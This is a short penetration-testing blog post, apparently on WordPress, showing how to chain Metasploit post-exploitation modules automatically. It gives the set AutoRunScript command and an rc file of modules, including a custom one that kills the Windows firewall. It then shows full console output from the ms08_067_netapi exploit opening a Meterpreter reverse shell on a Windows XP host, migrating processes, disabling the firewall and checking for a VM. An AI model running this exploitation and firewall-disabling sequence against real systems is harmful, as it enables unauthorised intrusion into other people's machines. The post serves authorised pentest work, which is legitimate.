Automation is the name of the pentest game

Metasploit auto run scripts are great when you need a module to run automatically post exploitation. Getting a single script to run post meterpreter is pretty easy, but what if you wanted multiple post scripts to run? From the msfconsole prompt run: set AutoRunScript multi_console_command -rc “path/name of rc file”

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Inside of the rc file just list the commands one by one like so:

run post/windows/manage/migrate

run post/windows/manage/killfw

run post/windows/gather/checkvm

Now save the file autoruncommands.rc inside of the root folder. Don’t use killfw because you won’t find it in your install. It is a module I wrote to autokill the windows firewall.

Now lets watch it in action:

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*] 	Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*] 	Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Advertisements

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: